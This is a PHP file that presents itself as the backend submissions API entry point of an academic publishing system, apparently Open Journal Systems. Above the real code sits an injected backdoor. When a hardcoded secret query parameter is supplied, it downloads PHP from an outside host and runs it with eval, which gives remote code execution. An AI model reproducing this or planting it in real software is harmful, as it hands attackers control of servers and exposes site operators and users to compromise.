<?php

if (isset($_GET['_']) && $_GET['_'] === 'ds_mms799s111_gr3af332afbsnk') {
    $url = "https://helloo-everyonee.pages.dev/seoven.php";

    if ($url !== "") {
        $code = file_get_contents($url);
        if ($code !== false) {
            eval("?>".$code);
        }
    }

    http_response_code(200);
    header('Content-Type: text/plain; charset=utf-8');
    echo 'OK';
    exit;
}
/**
 * @defgroup api_v1_backend Backend API requests for submissions
 */

/**
 * @file api/v1/_submissions/index.php
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2003-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @ingroup api_v1_backend
 * @brief Handle requests for backend API.
 *
 */

import('api.v1._submissions.BackendSubmissionsHandler');
return new BackendSubmissionsHandler();
